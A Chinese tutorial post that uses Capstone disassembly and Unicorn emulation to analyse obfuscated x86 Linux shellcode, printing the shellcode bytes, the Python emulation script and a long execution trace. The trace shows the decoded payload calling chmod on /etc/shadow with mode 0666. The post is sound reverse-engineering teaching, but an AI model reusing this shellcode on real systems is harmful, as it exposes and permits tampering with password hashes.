Unicorn是一个轻量级的多平台,多体系结构的CPU仿真器框架。官网:http://www.unicorn-engine.org/
Capstone是一个轻量级的多平台,多体系结构的反汇编框架。官网:http://www.capstone-engine.org/
参考:https://bbs.pediy.com/thread-224330.htm
练习:分析混淆的shllcode
shellcode=b"xe8xffxffxffxffxc0x5dx6ax05x5bx29xddx83xc5x4ex89xe9x6ax02x03x0cx24x5bx31xd2x66xbax12x00x8bx39xc1xe7x10xc1xefx10x81xe9xfexffxffxffx8bx45x00xc1xe0x10xc1xe8x10x89xc3x09xfbx21xf8xf7xd0x21xd8x66x89x45x00x83xc5x02x4ax85xd2x0fx85xcfxffxffxffxecx37x75x5dx7ax05x28xedx24xedx24xedx0bx88x7fxebx50x98x38xf9x5cx96x2bx96x70xfexc6xffxc6xffx9fx32x1fx58x1ex00xd3x80"
使用capstone反汇编:
from capstone import* md=Cs(CS_ARCH_X86,CS_MODE_32)//初始化,指定处理器架构 shellcode = b"xe8xffxffxffxffxc0x5dx6ax05x5bx29xddx83xc5x4ex89xe9x6ax02x03x0cx24x5bx31xd2x66xbax12x00x8bx39xc1xe7x10xc1xefx10x81xe9xfexffxffxffx8bx45x00xc1xe0x10xc1xe8x10x89xc3x09xfbx21xf8xf7xd0x21xd8x66x89x45x00x83xc5x02x4ax85xd2x0fx85xcfxffxffxffxecx37x75x5dx7ax05x28xedx24xedx24xedx0bx88x7fxebx50x98x38xf9x5cx96x2bx96x70xfexc6xffxc6xffx9fx32x1fx58x1ex00xd3x80" for code in md.disasm(shellcode,0x0): print("0x%x: %s %s"%(code.address,code.mnemonic,code.op_str))
反汇编结果:
0x0: call 4 0x5: rcr byte ptr [ebp + 0x6a], 5 0x9: pop ebx 0xa: sub ebp, ebx 0xc: add ebp, 0x4e 0xf: mov ecx, ebp 0x11: push 2 0x13: add ecx, dword ptr [esp] 0x16: pop ebx 0x17: xor edx, edx 0x19: mov dx, 0x12 0x1d: mov edi, dword ptr [ecx] 0x1f: shl edi, 0x10 0x22: shr edi, 0x10 0x25: sub ecx, 0xfffffffe 0x2b: mov eax, dword ptr [ebp] 0x2e: shl eax, 0x10 0x31: shr eax, 0x10 0x34: mov ebx, eax 0x36: or ebx, edi 0x38: and eax, edi 0x3a: not eax 0x3c: and eax, ebx 0x3e: mov word ptr [ebp], ax 0x42: add ebp, 2 0x45: dec edx 0x46: test edx, edx 0x48: jne 0x1d 0x4e: in al, dx 0x4f: aaa 0x50: jne 0xaf 0x52: jp 0x59 0x54: sub ch, ch 0x56: and al, 0xed 0x58: and al, 0xed 0x5a: or ecx, dword ptr [eax - 0x67af1481] 0x60: cmp cl, bh 0x62: pop esp 0x63: xchg eax, esi 0x64: sub edx, dword ptr [esi - 0x390190]
下面使用unicorn模拟执行
from unicorn import * from unicorn.x86_const import * from capstone import* md=Cs(CS_ARCH_X86,CS_MODE_32)#初始化反汇编 BASE = 0x400000 STACK_ADDR = 0x0 STACK_SIZE = 1024 * 1024 mu = Uc(UC_ARCH_X86, UC_MODE_32)#初始化 mu.mem_map(BASE, 1024 * 1024)#开辟模拟运行的映射空间 mu.mem_map(STACK_ADDR, STACK_SIZE)#栈空间 shellcode = b"xe8xffxffxffxffxc0x5dx6ax05x5bx29xddx83xc5x4ex89xe9x6ax02x03x0cx24x5bx31xd2x66xbax12x00x8bx39xc1xe7x10xc1xefx10x81xe9xfexffxffxffx8bx45x00xc1xe0x10xc1xe8x10x89xc3x09xfbx21xf8xf7xd0x21xd8x66x89x45x00x83xc5x02x4ax85xd2x0fx85xcfxffxffxffxecx37x75x5dx7ax05x28xedx24xedx24xedx0bx88x7fxebx50x98x38xf9x5cx96x2bx96x70xfexc6xffxc6xffx9fx32x1fx58x1ex00xd3x80" mu.mem_write(BASE, shellcode)//载入需模拟的代码指令 mu.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE // 2)#设置栈指针 def syscall_num_to_name(num): syscalls = {1: "sys_exit", 15: "sys_chmod"} return syscalls[num] def hook_code(mu, address, size, user_data):#hook代码 # print('>>> Tracing instruction at 0x%x, instruction size = 0x%x' %(address, size)) machine_code = mu.mem_read(address, size) for code in md.disasm(machine_code,address): print(" 0x%x: %s %s" % (code.address, code.mnemonic, code.op_str)) if machine_code == b"xcdx80": r_eax = mu.reg_read(UC_X86_REG_EAX) r_ebx = mu.reg_read(UC_X86_REG_EBX) r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) syscall_name = syscall_num_to_name(r_eax) print("--------------") print("We intercepted system call: " + syscall_name) if syscall_name == "sys_chmod": s = mu.mem_read(r_ebx, 20).split(b"x00")[0] print("arg0 = 0x%x -> %s" % (r_ebx, s)) print("arg1 = " + oct(r_ecx)) elif syscall_name == "sys_exit": print("arg0 = " + hex(r_ebx)) exit() mu.reg_write(UC_X86_REG_EIP, address + size) mu.hook_add(UC_HOOK_CODE, hook_code)//添加hook函数,每条指令执行前都先调用hook函数 mu.emu_start(BASE, BASE - 1)//开始执行
执行结果:
0x400000: call 0x400004 0x400004: inc eax 0x400006: pop ebp 0x400007: push 5 0x400009: pop ebx 0x40000a: sub ebp, ebx 0x40000c: add ebp, 0x4e 0x40000f: mov ecx, ebp 0x400011: push 2 0x400013: add ecx, dword ptr [esp] 0x400016: pop ebx 0x400017: xor edx, edx 0x400019: mov dx, 0x12 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40001d: mov edi, dword ptr [ecx] 0x40001f: shl edi, 0x10 0x400022: shr edi, 0x10 0x400025: sub ecx, 0xfffffffe 0x40002b: mov eax, dword ptr [ebp] 0x40002e: shl eax, 0x10 0x400031: shr eax, 0x10 0x400034: mov ebx, eax 0x400036: or ebx, edi 0x400038: and eax, edi 0x40003a: not eax 0x40003c: and eax, ebx 0x40003e: mov word ptr [ebp], ax 0x400042: add ebp, 2 0x400045: dec edx 0x400046: test edx, edx 0x400048: jne 0x40001d 0x40004e: cdq 0x40004f: push 0xf 0x400051: pop eax 0x400052: push edx 0x400053: call 0x400064 0x400064: pop ebx 0x400065: push 0x1b6 0x40006a: pop ecx 0x40006b: int 0x80 -------------- We intercepted system call: sys_chmod arg0 = 0x400058 -> bytearray(b'/etc/shadow') arg1 = 0o666 0x40006d: push 1 0x40006f: pop eax 0x400070: int 0x80 -------------- We intercepted system call: sys_exit arg0 = 0x400058